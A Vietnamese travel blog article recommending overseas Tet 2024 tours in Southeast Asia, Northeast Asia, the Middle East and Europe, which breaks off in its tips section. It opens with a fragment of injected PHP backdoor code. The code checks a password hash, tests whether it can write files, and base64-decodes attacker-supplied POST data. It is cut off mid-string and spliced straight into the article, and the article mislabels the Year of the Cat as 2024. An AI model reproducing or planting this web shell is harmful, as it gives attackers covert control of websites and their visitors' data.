function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Trải nghiệm tour Tết nước ngoài 2024 đón năm mới nơi xứ lạ

Trải nghiệm tour Tết nước ngoài 2024 đón năm mới nơi xứ lạ

13/12/2022 Đi Để Đến - Group

Ngày nay, thị trường du lịch Tết tại nước ngoài ngày càng sôi động, đặc biệt trong bối cảnh các quốc gia đang mở cửa phục hồi du lịch sau đại dịch. Các công ty lữ hành cũng tổ chức nhiều tour Tết nước ngoài 2024 để phục vụ nhu cầu du lịch tăng cao vào thời điểm này. Xu hướng du lịch nước ngoài Tết này được các bạn trẻ vô cùng yêu thích.

Tour Tết nước ngoài 2024 rất đa dạng với những điểm đến ở các khu vực như Đông Nam Á, Đông Bắc Á, Tây Nam Á và Trung Đông hay Châu Âu. Dưới đây dideden.com gợi ý bạn một vài hành trình thú vị đón xuân Quý Mão tại nơi xứ lạ.

XU THẾ TRẢI NGHIỆM TOUR TẾT NƯỚC NGOÀI 2024 CÓ GÌ HAY?

1. Tour Tết nước ngoài 2024 – Tận dụng thời gian nghỉ dài ngày

Tết Nguyên Đán thường là khoảng thời gian học sinh, sinh viên, công chức, người lao động được nghỉ khá dài ngày mà không bị tính nghỉ phép. Do đó, du khách hoàn toàn có thể yên tâm lên lịch trình đi du lịch thỏa thích mà không cần lo lắng về sắp xếp thời gian bởi tất cả mọi người cùng được nghỉ lễ.

tour tet nuoc ngoai 2023 - nghi duong

Tận hưởng nghỉ dưỡng dài ngày trong dịp Tết Nguyên Đán. Nguồn: Sưu tầm

Thông thường các công ty, trường học và nhà nước cho phép cán bộ, nhân viên, học sinh, sinh viên nghỉ Tết trong khoảng 1 đến 2 tuần. Quãng thời gian này hoàn toàn phù hợp với những du khách nào mong muốn đi chơi xa hay tham gia tour Tết nước ngoài 2024

Thay vì dành cả ngày ở nhà đón Tết một cách truyền thống, bạn hãy thử xách balo lên và khám phá những vùng đất mới mà không phải thời gian nào cũng có cơ hội trải nghiệm. Đừng chần chừ nghiên cứu những tour Tết nước ngoài 2024 phù hợp với mình để du ngoạn trong dịp Tết Quý Mão sắp tới.

>>> Xem thêm: Gợi ý các địa điểm du lịch Tết hấp dẫn trong 2024

2. Tour Tết nước ngoài 2024 – Tiết trời vào Xuân mát mẻ

Tết Nguyên Đán sẽ rơi vào khoảng nửa cuối tháng 1 và nửa đầu tháng 2 dương lịch hàng năm. Tại một số quốc gia, thời tiết vào Xuân sẽ tương đối dễ chịu, ôn hòa, trăm hoa đua nở và chồi non xanh mơn mởn cũng nảy lộc trên từng cành cây. Khí hậu tốt cũng giúp cho cảnh quan xung quanh trở nên đẹp đẽ hơn, giúp bạn tận hưởng chuyến ngao du trọn vẹn nhất.

Ngoài ra, bạn cũng có thể lựa chọn tận hưởng tour Tết nước ngoài 2024 tại những bãi biển đầy nắng hay những nơi xứ lạnh vẫn còn băng tuyết phủ trắng xóa. Thời điểm này là thời khắc chuyển giao đặc biệt trên toàn thế giới, mở ra rất nhiều lựa chọn du lịch cho bạn phù hợp với từng sở thích và nhu cầu khác nhau.

3. Tour Tết nước ngoài 2024 – Tận hưởng ưu đãi, du lịch giá thấp

Thời điểm Tết Nguyên Đán rất nhiều những công ty lữ hành, hãng hàng không hay khách sạn sẽ tung ra các ưu đãi du lịch hấp dẫn. Bạn có thể săn ưu đãi ngay từ bây giờ để tiết kiệm chi phí cho chuyến đi tour Tết nước ngoài 2024

Du khách có thể tìm kiếm thông tin về tour Tết nước ngoài 2024 tại trang web của công ty du lịch với giá rẻ, nhiều ưu đãi tri ân khách hàng. Các khách sạn, homestay để kích cầu du lịch cũng sẽ đưa ra chương trình giảm giá phòng nghỉ để mời chào du khách. 

4. Tour Tết nước ngoài 2024 – Nhiều đất nước không nghỉ Tết

Nhiều du khách muốn đi chơi vào dịp Tết nhưng hàng quán lại đóng cửa, các địa điểm tham quan khoảng thời gian này tại Việt Nam khá hạn chế do cả nước đang trong kỳ nghỉ lễ. Trong khi đó, một số quốc, đặc biệt là các nước phương Tây không có kỳ nghỉ Tết Nguyên Đán, các hoạt động du lịch vẫn diễn ra bình thường. 

Do vậy lựa chọn đi tour Tết nước ngoài 2024 là vô cùng thích hợp cho những ai thích di chuyển và khám phá những vùng đất mới. Ngoài ra, du khách cũng có thể lựa chọn du lịch tour Tết nước ngoài 2024 tại một số quốc gia châu Á coi trọng Tết Nguyên Đán để tham gia các lễ hội truyền thống và tìm hiểu sự khác biệt văn hóa trong tổ chức lễ Tết.

Không phải lúc nào bạn cũng có thể có cơ hội để chu du thế giới. Vì vậy du lịch dịp Tết Quý Mão này là lúc bạn được trải nghiệm văn hóa, tìm hiểu lịch sử của các dân tộc khác nhau trong chuyến tour Tết nước ngoài 2024.

>>> Xem thêm: Đi du lịch nước ngoài nên đi đâu đẹp nhất?

5. Tour Tết nước ngoài 2024 – Gắn kết và lưu giữ kỉ niệm

Với tư tưởng du lịch mới của giới trẻ hiện nay, dần dần các gia đình cũng đã cởi mở hơn về việc du lịch vào dịp Tết Nguyên Đán. Bạn hoàn toàn có thể sắp xếp dọn dẹp nhà cửa, thắp hương bàn thờ tổ tiên sớm hơn dự kiến để dành thời gian còn lại của kỳ nghỉ để đi tour Tết nước ngoài 2024

Thậm chí, một số gia đình ngày nay còn chọn tour Tết nước ngoài 2024 du lịch cả đại gia đình vào dịp Tết Nguyên Đán. Du khách có thể cùng gia đình lưu lại những kỉ niệm quý báu của một cái Tết xa nhà, mang đến những ký ức không thể phải cho mỗi người. Rủ gia đình, bạn bè, người yêu cùng nhau đi trốn tại nơi xa lạ cũng là một cách giúp mọi người gần nhau hơn.

tour tet nuoc ngoai 2023 - du lich cung gia dinh

Lưu giữ kỉ niệm cùng người thân và gia đình. Nguồn: Sưu tầm

6. Tour Tết nước ngoài 2024 – Giải tỏa mệt mỏi

Tết là khoảng thời gian mà bạn có thể gác lại những công việc và học hành, dành thời gian để nghỉ ngơi và thư giãn. Cũng vì vậy, những chuyến du lịch trong tâm thế thư thái sẽ giúp bạn tận hưởng được trọn vẹn nhất chuyến đi của mình. Tour Tết nước ngoài 2024 sẽ là một lựa chọn tuyệt vời để bạn tận hưởng những thành quả mình đã đạt được.

Hãy tranh thủ những phút giây được thoát khỏi deadline để tận hưởng cuộc sống, reset lại bản thân để tận hưởng tuổi trẻ. Thay vì làm những việc như rửa mâm bát, dọn dẹp cỗ Tết, bạn có thể xách balo chu du thế giới, khoác trên mình những bộ cánh đẹp nhất và check-in tại những địa điểm đẹp như mơ khi trải nghiệm đón năm mới với tour Tết nước ngoài 2024.

CHÙM TOUR TẾT NƯỚC NGOÀI 2024 THEO VỊ TRÍ ĐỊA LÝ

1. Tour Tết nước ngoài 2024 tại Đông Nam Á

Tour Tết nước ngoài 2024 tại Thái Lan

Là điểm đến hot hit nhất tại khu vực Đông Nam Á, tour Tết nước ngoài 2024 tại Thái Lan sẽ là lựa chọn tuyệt vời cho du khách yêu thích đón Tết Nguyên Đán tại nơi xa. Đất nước chùa Vàng tổ chức rất nhiều lễ hội vào dịp Tết này trong đó du khách có thể tham gia lễ hội hoa Chiang Mai, lễ hội Bosang Umbrella Fair đầy màu sắc,.. 

tour tet nuoc ngoai 2023 - Bosang Umbrella Fair

Trải nghiệm lễ hội Bosang Umbrella Fair đầy màu sắc. Nguồn: Sưu tầm

Du khách đi tour Tết nước ngoài 2024 hãy thử trải nghiệm đón giao thừa trên du thuyền sông Chao Phraya tại thủ đô Bangkok. Một bữa tối đầy lãng mạn cùng ngắm pháo hoa rực rỡ với người thân thương sẽ để lại kỉ niệm khó phai. Ngoài ra, bạn cũng có thể biến chuyến du lịch của mình trở nên mới lạ hơn khi hòa mình vào lễ hội bên bờ biển tại đảo thiên đường Phuket.

Ngoài việc tham quan các địa điểm du lịch nổi tiếng tại đất nước Thái Lan xinh đẹp, du khách đi tour Tết nước ngoài 2024 tại Thái Lan có thể tham gia các hoạt động giải trí khác đặc sắc như massage Thái cổ truyền hay thưởng thức show âm nhạc chuyển giới Alcazar tại Pattaya.

>>> Xem thêm: Tour Thái Lan giá rẻ 2024 – Tổng hợp kinh nghiệm du lịch A-Z

Tour Tết nước ngoài 2024 tại Singapore

Quốc đảo Sư Tử là một lựa chọn hoàn hảo cho tour Tết nước ngoài 2024 nếu bạn muốn đắm mình vào không khí lễ hội sôi động tại một thành phố hiện đại bậc nhất thế giới. Đón năm mới tại Singapore, du khách được tham gia các lễ hội chào năm mới điển hình như lễ hội hoa đăng, lễ hội hóa trang, hay những màn pháo hoa đầy sắc màu và ấn tượng.

Chắc chắn trải nghiệm ngắm pháo hoa từ trên đài quan sát đỉnh tòa nhà Marina Bay Sands hay từ vòng đu quay khổng lồ Singapore Flyer sẽ để lại cho du khách một kỉ niệm tour Tết nước ngoài 2024 vô cùng đáng nhớ. Du khách cũng có thể thưởng thức MBS Show hiện đại trên Marina Bay Sands.

Singapore là nơi có rất nhiều những địa điểm tham quan nổi tiếng du khách có thể trải nghiệm trong tour Tết nước ngoài 2024 như Garden By The Bay, Công viên sư tử biển (Merlion Park), Nhà hát Esplanade, các trung tâm thương mại lớn hay đặc biệt là công viên giải trí nổi tiếng bậc nhất thế giới Universal Studio.

>>> Xem thêm: Tour đi Singapore: Du lịch trọn gói giá rẻ bất ngờ

Tour Tết nước ngoài 2024 tại Malaysia

Đối với dịp xuân Quý Mão này, du khách cũng có thể tham khảo các tour Tết nước ngoài 2024 tại Malaysia, một đất nước sở hữu nhiều địa điểm du lịch độc đáo. Nằm trong khu vực Đông Nam Á và rất thuận tiện để đi du lịch từ Việt Nam, Malaysia được coi là thiên đường nhiệt đới mà du khách có thể thả mình vào với thiên nhiên.

Malaysia cũng tổ chức các lễ hội đón Tết rất náo nhiệt. Đến với tour Tết nước ngoài 2024 tại Malaysia, bạn có thể tham gia lễ hội Chap Goh Meh để thả đèn hoa đăng hay khám phá nét ăn Tết truyền thống của dân bản địa tại ngôi làng cổ Sarawak. Hơn nữa, chắc chắn bạn cũng sẽ không thể bỏ lỡ cơ hội sống ảo với từng ngóc ngách tại thủ đô Kuala Lumpur tráng lệ. 

Tour Tết nước ngoài 2024 tại Campuchia

Du khách có thể lựa chọn Campuchia là điểm đến cho chuyến tour Tết nước ngoài 2024. Một chuyến du lịch ngắn 4 ngày 3 đêm là đã đủ để bạn khám phá đất nước chùa tháp láng giềng. Vương quốc Campuchia vẫn còn có phần hoang sơ, phù hợp với các du khách đam mê khám phá cùng những câu chuyện về tâm linh đầy huyền bí. 

Campuchia được biết đến với nhiều ngôi đền cổ kính, các kiến trúc tôn thờ đạo Phật, hoàng cung,… Du khách sẽ được khám phá văn hóa của người Khmer, dân tộc chiếm đa số ở quốc gia này. Hơn nữa, bạn cũng sẽ tham quan một di sản văn hóa của thế giới, được chọn làm bối cảnh của một bộ phim Hollywood nổi tiếng, Bí Mật Ngôi Mộ Cổ, đó là quần thể Ta Prohm. 

Đến với tour Tết nước ngoài 2024, du khách không thể bỏ lỡ tham quan kỳ quan thế giới được UNESCO công nhận, đền cổ Angkor Wat, tượng đài văn hóa của Campuchia. Angkor Wat hấp dẫn du khách với lối kiến trúc vô cùng ấn tượng, được các nghệ nhân chạm khắc vô cùng tinh xảo. 

tour tet nuoc ngoai 2023 - angkor wat

Check-in cùng đền cổ đền cổ Angkor Wat kỳ vĩ. Nguồn: Sưu tầm

>>> Xem thêm: Tour du lịch khám phá Campuchia dịp tết dương lịch 2024 (4N3Đ)

2. Tour Tết nước ngoài 2024 tại Đông Bắc Á

Tour Tết nước ngoài 2024 tại Đài Loan

Đài Loan là đất nước đón Tết với những văn hóa, nghi thức truyền thống mang đậm chất Á Đông. Khắp mọi nơi sẽ được bao phủ bởi sắc màu đỏ đặc trưng của Tết cổ truyền. Tour Tết nước ngoài 2024 tại Đài Loan hứa hẹn sẽ mang lại cho du khách những trải nghiệm truyền thống nhất nhưng vẫn có phần khác biệt so với Tết tại Việt Nam.

Cũng giống như người Việt, người Đài Loan đa phần theo đạo Phật do vậy văn hóa đi chùa đầu năm rất phổ biến. Du khách có thể đi thăm những ngôi chùa, miếu thờ để cúng bái trong chuyến tour Tết nước ngoài 2024. Một số nơi nổi tiếng bạn nên ghé thăm như Phật Quang Sơn Tự, Văn Võ Miếu, Tháp Long Hổ,… 

Du khách có thể bắt gặp sự nhộn nhịp, sầm uất của những phiên chợ Tết tại bất kỳ nơi đâu của Đài Loan. Hãy ghé thăm khu chợ đêm Shilin, chợ đêm Ximending, hay các khu ẩm thực đường phố trong tour Tết nước ngoài 2024 tại Đài Loan để khám phá ẩm thực tuyệt vời của nơi này. 

Đài Loan chính là thiên đường đối với các tín đồ đam mê ẩm thực. Chắc hẳn bạn sẽ không thể cưỡng lại được trước sự hấp dẫn của thức uống trà sữa chính gốc nổi tiếng khắp thế giới của người Đài. Hơn nữa, tới đây bạn nên lấp đầy chiếc bụng của mình với các món ăn đặc trưng như đậu hũ thối, mì bò, thịt viên Bawan, trứng bắc thảo, bánh kếp, bánh dứa,…

Tour Tết nước ngoài 2024 tại Hàn Quốc

Xứ sở kim chi Hàn Quốc cũng giống như Việt Nam đó là đón Tết Nguyên Đán nhộn nhịp với hàng loạt lễ hội được tổ chức trong dịp lễ này. Tour Tết nước ngoài 2024 tại Hàn Quốc đảm bảo sẽ làm hài lòng các tín đồ đam mê xê dịch với những trải nghiệm văn hóa độc đáo. 

Hàn Quốc vào thời điểm này vẫn còn rất lạnh, nhiệt độ khoảng -15 độ C đến 10 độ C. Do vậy nếu du khách muốn trải nghiệm và chụp những tấm hình tuyệt đẹp với tuyết rơi thì có thể lựa chọn quốc gia này là điểm đến cho dịp Tết Quý Mão tới đây.

tour tet nuoc ngoai 2023 - Han Quoc

Tham gia lễ hội đón Tết cùng người Hàn Quốc. Nguồn: Sưu tầm

Vào khoảng thời gian cuối tháng 1, trùng vào dịp Tết Nguyên Đán, núi Taebaek sẽ tổ chức lễ hội tuyết Taebaeksan Snow Festival khi đây là dịp tuyết rơi nhiều nhất trong năm tại Hàn Quốc. Bạn có thể lựa chọn tham gia lễ hội với rất nhiều các hoạt động thú vị liên quan đến tuyết như trượt tuyết, ném tuyết cho chuyến tour Tết nước ngoài 2024.

Một lễ hội cũng vô cùng đặc biệt mà bạn có thể trải nghiệm trên dòng sông Hwacheon, tỉnh Gangwon đó là lễ hội sông băng Hwacheon Sancheoneo. Hoạt động chính của lễ hội đó chính là câu cá hồi trên sông băng. Bạn có thể câu cá bằng cách đục những lỗ tròn trên dòng sông băng sau đó thả mồi câu hoặc thậm chí bắt cá bằng tay và sẽ được mang chiến lợi phẩm về.

Hơn nữa, du khách có thể chọn đi tour Tết nước ngoài 2024 tại đảo Jeju của Hàn Quốc. Hòn đảo này có khí hậu ôn hòa, vô cùng dễ chịu. Du khách chắc chắn sẽ bị vẻ đẹp của hòn đảo này làm say đắm với bãi biển thơ mộng, cây cỏ xanh tươi tràn đầy sức sống. Đặc biệt du khách Việt Nam còn được miễn visa lưu trú khi tới tham quan đảo Jeju thời hạn lên đến 30 ngày.

>>> Xem thêm: Tour du lịch Hàn Quốc 5N4Đ dịp Tết Nguyên Đán

Tour Tết nước ngoài 2024 tại Nhật Bản

Nhật Bản từ lâu đã không đón Tết âm lịch cổ truyền như nhiều quốc gia châu Á khác. Vào thời điểm này, Nhật Bản đang khoác trên mình một chiếc áo tuyết trắng tinh, hòa cùng với khung cảnh thơ mộng của những hàng cây, ngôi chùa, ngôi đền nơi đây. 

Tour Tết nước ngoài 2024 tại Nhật Bản sẽ đem lại cho du khách trải nghiệm mới mẻ, thoải mái nghịch tuyết mà người Việt Nam gần như không có cơ hội được thấy nhiều. Có rất nhiều các hoạt động mà du khách có thể vui chơi tại xứ xở hoa anh đào trong thời điểm này như trượt tuyết, trượt băng, tham quan di tích lịch sử, thư giãn tại bồn tắm nước nóng onsen lộ thiên,… 

Đừng quên ghé thăm những ngôi chùa và cung điện nổi tiếng của Nhật Bản vào mùa tuyết rơi bởi chúng dường như trở nên đặc biệt hơn với những nóc nhà phủ tuyết trắng. Cùng với đó, du khách cũng được check-in với đỉnh núi Phú Sĩ nổi tiếng trong hành trình ngao du tour Tết nước ngoài 2024 tại Nhật Bản. 

>>> Xem thêm: Tour du lịch Nhật Bản ngắm hoa anh đào dịp Tết âm lịch

Tour Tết nước ngoài 2024 tại Mông Cổ

Trùng với dịp Tết Nguyên Đán của Việt Nam, Mông Cổ cũng đón Tết Tsagaan Sar hay còn gọi là Tết Tháng Trắng, một trong những ngày lễ được tổ chức lớn nhất và quan trọng nhất của đất nước này. Hãy dành thời gian nghỉ Tết Quý Mão của bạn để khám phá văn hóa cổ truyền của Mông Cổ với tour Tết nước ngoài 2024

Vào ngày lễ Tsagaan Sar, khác với những nơi khác yêu thích sắc màu rực rỡ, người Mông Cổ lại sử dụng màu trắng với những bộ trang phục trắng, tặng quà có màu trắng, cưỡi ngựa trắng hay thậm chí chế biến thức ăn từ sữa trắng. Lễ hội này mang ý nghĩa khích lệ tinh thần, gắn kết gia đình và màu trắng là để thể hiện cho sự thuần khiết, tránh điều xấu của người Mông Cổ.

tour tet nuoc ngoai 2023 - mong co

Đón Tết Tsagaan Sar của người Mông Cổ với văn hóa, phong tục đặc sắc. Nguồn: Sưu tầm

Có rất nhiều món ăn đặc biệt bạn có thể thưởng thức khi tới đây tham quan những ngày Tết của người Mông Cổ. Món thịt cừu Uut sẽ được những người dân nơi đây mời những du khách tới thăm nhà vào những ngày Tsagaan Sar. Hay bạn cũng nên thử sữa ngựa Airag lên men, Tsagaalga làm từ sữa đông, bánh ngọt Ul boov trang trí trong mâm cỗ Tết, bánh bao Buuz,… 

3. Tour Tết nước ngoài 2024 tại Tây Nam Á và Trung Đông

Tour Tết nước ngoài 2024 tại Ấn Độ

Ấn Độ là một đất nước có sự đa dạng, giao thoa về văn hóa, tôn giáo và sắc tộc. Tour Tết nước ngoài 2024 tại Ấn Độ chắc chắn sẽ trở thành trải nghiệm thú vị của bạn trong dịp Tết Quý Mão sắp tới. Thời điểm này đúng vào mùa đông của Ấn Độ nên tiết trời mát mẻ, dễ chịu nhất trong năm, thích hợp cho những chuyến du lịch nghỉ dưỡng.

Du khách có cơ hội tham quan di sản Đền Taj Mahal bằng đá cẩm thạch trắng, mang phòng cách Hồi giáo hay kiến trúc vương triều Mughal bằng sa thạch đỏ, Pháo Đài Đỏ Agra. Lăng Taj Mahal thuộc một trong 7 kỳ quan thiên nhiên của thế giới, được cấu tạo từ nhiều loại đá quý khác nhau, phát sáng một cách rực rỡ chắc chắn là địa điểm không thể bỏ lỡ khi đi tour Tết nước ngoài 2024.

Du lịch đất nước dòng sông Hằng, du khách nên ăn thử ẩm thực đặc trưng của Ấn Độ, được chế biến đậm đà với nhiều loại gia vị khác nhau. Nhắc đến ẩm thực của Ấn Độ thì chắc chắn phải nhắc đến cà ri, được sử dụng hàng ngày trong các bữa ăn của người Ấn hay những chiếc bánh Chapati giòn thơm, gà Tandoori béo ngậy,… 

>>> Xem thêm: Kinh nghiệm du lịch Ấn Độ cho người mới đi lần đầu

Tour Tết nước ngoài 2024 tại Maldives

Bạn muốn tận hưởng một kỳ nghỉ dưỡng sang trọng tại khách sạn xịn bên bờ biển tuyệt đẹp, hãy đến với tour Tết nước ngoài 2024 tại hòn đảo thiên đường Maldives. Nơi đây tụ họp các dịch vụ nghỉ dưỡng hàng đầu thế giới, có sức hút mạnh mẽ và được nhiều siêu sao trên thế giới yêu thích.

Lựa chọn tour Tết nước ngoài 2024 tại đảo quý tộc Maldives, du khách sẽ được trải nghiệm nghỉ ngơi tại những resort, khách sạn cao cấp với dịch vụ giải trí hạng sang. Hãy tận hưởng một năm mới bên người yêu thương với bữa tối sang trọng bên bờ biển, thưởng thức ly Cocktail và hòa mình vào những âm điệu sôi động.

tour tet nuoc ngoai 2023 - Maldives

Kỳ nghỉ dưỡng sang trọng bên bờ biển tuyệt đẹp của hòn đảo thiên đường Maldives. Nguồn: Sưu tầm

Ngoài việc tham quan một số điểm đến như Nhà thờ Hồi giáo, chợ quà lưu niệm, hay tắm biển tại bờ biển cát trắng mịn, trong tour Tết nước ngoài 2024, du khách có cơ hội lặn biển ngắm nhìn những loài sinh vật biển và ngắm nhìn những rặng san hô sặc sỡ. Hơn nữa, bạn cũng có thể tham gia các môn thể thao biển khác như lướt ván buồm windsurfing, chèo kayak, sup,…

Tour Tết nước ngoài 2024 tại Dubai

Một điểm đến sang chảnh, được mệnh danh là mảnh đất dát vàng, Dubai sẽ là điểm đến lý tưởng cho tour Tết nước ngoài 2024 đối với những du khách đam mê xê dịch. Đến với Dubai, bạn sẽ được mãn nhãn với những công trình kiến trúc cực khủng, đồ sộ bậc nhất thế giới. Tới Dubai, du khách có thể trải nghiệm những dịch vụ cao cấp nhất thế giới tại các khách sạn, resort 5 sao đầy tráng lệ và tiện nghi.

Du lịch Dubai trong tour Tết nước ngoài 2024, du khách nhất định phải thử món cơm truyền thống Al Machboos, lạc đà nhồi thịt mà chỉ có tại đây. Cocktail cũng là một loại thức uống rất phổ biến tại quốc gia giàu sang này, được pha chế từ những loại rượu tuyệt hảo nhất và phục vụ trong chiếc ly đẹp nhất đầy tinh xảo.

>>> Xem thêm: Cẩm nang du lịch Dubai – Thành phố giàu có bậc nhất thế giới

Tour Tết nước ngoài 2024 tại Israel

Israel là một đất nước thuộc vùng Trung Đông vô cùng thịnh vượng, đem đến cho bạn những trải nghiệm khó quên trong tour Tết nước ngoài 2024 sắp tới. Đất nước nhỏ bé nằm trên vùng sa mạc khô cằn rộng lớn nhưng lại có vùng biển Địa Trung Hải tuyệt đẹp bậc nhất thế giới.  

Thành cổ Jerusalem là nơi bạn không thể không tới khi đặt chân xuống Israel. Nơi đây được coi là thánh địa tôn giáo, gắn liền với những di tích ngàn năm tuổi của nền tôn giáo Israel. Du khách tới Israel du lịch tour Tết nước ngoài 2024 có cơ hội được thăm Biển Chết, nơi dù không biết bơi bạn vẫn có thể nổi bồng bềnh trên mặt biển.

tour tet nuoc ngoai 2023 - Israel

Trải nghiệm tự nổi trên biển Chết tại Israel. Nguồn: Sưu tầm

Các tín đồ du lịch càng không thể bỏ lỡ di sản văn hóa thế giới, thành phố không ngủ Tel Aviv. Nơi đây vô cùng nhộn nhịp với vô vàn các địa điểm vui chơi giải trí như quán bar, nhà hàng, trung tâm mua sắm, các câu lạc bộ giải trí,… và những địa điểm tham quan như công viên, bảo tàng, phòng hòa nhạc, nhà hát,…

4. Tour Tết nước ngoài 2024 tại Châu Âu

Tour Tết nước ngoài 2024 tại Phần Lan

Các nước Châu Âu sẽ không đón Tết Nguyên Đán do vậy các hoạt động vẫn diễn ra như thường ngày. Phần Lan là một quốc gia châu Âu được thiên nhiên ưu ái dành cho khung cảnh thiên nhiên tuyệt đẹp. Bạn có thể tham gia tour Tết nước ngoài 2024 để trải nghiệm sự tĩnh lặng của mùa đông đất nước hạnh phúc Phần Lan xinh đẹp. 

Phần Lan có số lượng tuần lộc lớn nhất trên thế giới và cũng là quê hương của Ông già Noel. Du khách có thể ghé thăm Làng Santa Claus tại Rovaniemi để tìm hiểu về nguồn gốc của Ông già Noel và ghét thăm công viên giải trí dưới lòng đất với chủ đề Noel.

tour tet nuoc ngoai 2023 - lang santa claus

Ghé thăm Làng Santa Claus tại Rovaniemi, quê hương của Ông già Noel. Nguồn: Sưu tầm

Du khách tới đây vào dịp Tết Nguyên Đán sẽ được trải nghiệm các hoạt động thể thao tuyết trên núi. Đặc biệt, đất nước này là điểm săn cực quang nổi tiếng nhất thế giới. Bạn sẽ được ngắm nhìn màn trình diễn ánh sáng của thiên nhiên trong tour Tết nước ngoài 2024 mà không phải lúc nào bạn cũng có cơ hội trải nghiệm. 

Đến với đất nước hạnh phúc Phần Lan, bạn sẽ được trải nghiệm các món ăn đặc trưng như các loại phô mai thơm ngon béo ngậy, bánh mì lúa mạch đen cổ điển hay món thịt tuần lộc xào rưới sốt nam việt quất Poronkäristys.

>>> Xem thêm: Du lịch tết châu Âu 2024 có nhiều sự lựa chọn thú vị

Tour Tết nước ngoài 2024 tại Italy

Vào thời điểm Tết Âm Lịch, Italy đang ở giữa mùa đông do vậy lượng khách du lịch tới đất nước này cũng không quá nhiều. Đây sẽ là thời điểm đặc biệt thích hợp cho du khách “trốn Tết” và thỏa mãn đam mê khám phá văn hóa Roma cổ đại với tour Tết nước ngoài 2024.

Đất nước hình chiếc ủng được biết đến với những di tích cổ hàng ngàn năm tuổi. Đến với tour Tết nước ngoài 2024 tại Ý, bạn không thể bỏ lỡ những địa điểm tham quan nổi tiếng như Đấu trường La Mã, Quảng trường Venezia hay du thuyền khám phá dòng sông Venice lãng mạn.

Chắc chắn bạn sẽ không thể cưỡng lại trước những món ăn Ý nổi tiếng, đầy tinh tế và ngọt ngào. Trong thời gian tham gia tour Tết nước ngoài 2024 tại đây, du khách có cơ hội thưởng thức Pizza và và các loại pasta chính gốc như Pizza Napoletana, Quattro Formaggi, Spaghetti, Lasagna,… Ngoài ra còn có rất nhiều món ăn tráng miệng trong đó nổi tiếng nhất là món kem Gelato trứ danh.

Tour Tết nước ngoài 2024 tại Đức

Nước Đức được mệnh danh là trái tim của châu Âu, nổi bật với những tòa lâu đài cổ lộng lẫy, món xúc xích Đức trứ danh cùng với cốc bia lớn đầy sảng khoái. Mùa đông của Đức trùng vào dịp Tết của Việt Nam, là khoảng thời gian ít người đi du lịch. Do vậy bạn có thể tiết kiệm được chi phí khi đi tour Tết nước ngoài 2024 tại Đức lúc này bởi dịch vụ giá rẻ hơn so với những ngày cao điểm.

Thời điểm này nước Đức đang được phủ trắng bởi tuyết, thích hợp để tham gia những trò chơi thể thao tuyết. Hơn nữa, những tòa lâu đài, những ngôi nhà được bao phủ trong tuyết chắc chắn sẽ là một khung cảnh vô cùng ngoạn mục. Bạn sẽ không thiếu những bức ảnh đẹp và ấn tượng trong chuyến tour Tết nước ngoài 2024 vào mùa đông châu Âu.

Ngoài ra có một loại thức uống chỉ được phục vụ vào mùa đông ở Đức đó là vang nóng Glühwein, được đun nóng từ rượu nho đỏ. Nói đến đặc sản của nước Đức, từ lâu ai ai cũng biết đến thương hiệu xúc xích Đức vang danh khắp thế giới. Bạn có thể tìm thấy món ăn này bất cứ đâu từ những quán ăn nhanh bên đường hay các nhà hàng sang trọng khi tham gia tour Tết nước ngoài 2024.

tour tet nuoc ngoai 2023 - xuc xich Duc

Thưởng thức đặc sản xúc xích Đức nổi tiếng thế giới. Nguồn: Sưu tầm

Tour Tết nước ngoài 2024 tại Thụy Sĩ

Thụy Sĩ là một đất nước đẹp mê hồn, một trong những địa điểm du lịch đứng đầu thế giới. Khung cảnh Thụy Sĩ vào thời điểm Tết ngập tràn trong tuyết trắng. Dù không phải thời điểm đẹp nhất của quốc gia này nhưng sự quyến rũ của Thụy Sĩ chắc chắn vẫn khiến du khách tới đây trong tour Tết nước ngoài 2024 xao xuyến với núi non trùng điệp, những ngôi nhà gỗ cổ kính.

Du lịch Thụy Sĩ vào mùa đông, du khách sẽ được thoải mái khám phá các địa điểm tham quan mà không cần phải chờ xếp hàng tới lượt. Bạn có thể tới các đỉnh núi như núi Titlis để tham gia trượt tuyết hay tới thăm những ngôi làng nhỏ đầy thơ mộng như Gimmelwald, Grindelwald, Lauterbrunnen,… 

>>> Xem thêm: Dịch vụ làm visa đi Thụy Sĩ

Khi tham gia tour Tết nước ngoài 2024 tại Thụy Sĩ, du khách không thể bỏ qua món chocolate nổi tiếng của đất nước này. Bạn cũng có thể mua chocolate để làm quà với rất nhiều hãng chocolate của Thụy Sĩ nổi tiếng thế giới như Lindt, Toblerone, Milka, Swiss Chocolate Chalet, Cailler,… 

Fondue cũng là một món ăn truyền thống nổi tiếng tại Thụy Sĩ mà du khách nên thử trong tour Tết nước ngoài 2024. Còn gì hấp dẫn bằng việc thưởng thức những miếng bánh mì nướng thơm lừng được nhúng vào nồi phô mai đun chảy béo ngậy. 

MỘT VÀI LƯU Ý KHI ĐI TOUR TẾT NƯỚC NGOÀI 2024

1. Chuẩn bị Visa

Có một số công ty tổ chức tour Tết nước ngoài 2024 sẽ bao gồm cả dịch vụ làm Visa cho bạn. Bạn nên đặt tour Tết nước ngoài 2024 khoảng 3 tháng trước khi đi nếu bạn muốn du lịch tại những nước yêu cầu có Visa như các nước châu Âu, Đông Á, Trung Đông,…

2. Đúng giờ, đúng địa điểm

Để chuyến du lịch tour Tết nước ngoài 2024 được suôn sẻ, hãy chắc chắn rằng bạn luôn có mặt đúng giờ tại điểm hẹn. Hãy chuẩn bị cho mình một chiếc đồng hồ để kiểm soát thời gian của bạn. Sự chậm trễ sẽ làm ảnh hưởng đến trải nghiệm du lịch của chính bạn và của những du khách khác đi tour Tết nước ngoài 2024.

3. Chuẩn bị tài chính

Bạn nên liệt kê rõ ràng tất cả chi phí mình sẽ sử dụng trong chuyến đi tour Tết nước ngoài 2024. Hơn nữa, để đề phòng chi phí phát sinh, bạn nên có sẵn tiền trong tài khoản Visa của mình hoặc mang tiền mặt đi kèm. Mỗi nước sẽ sử dụng đồng tiền khác nhau do vậy bạn nên đổi tiền trước tại Việt Nam hoặc nhờ hướng dẫn viên giúp đổi tiền tại các quầy đổi tiền.

>>> Xem thêm: Gét gô du lịch quốc tế 2024: Lưu ý quan trọng

4. Tìm hiểu trước về địa điểm du lịch

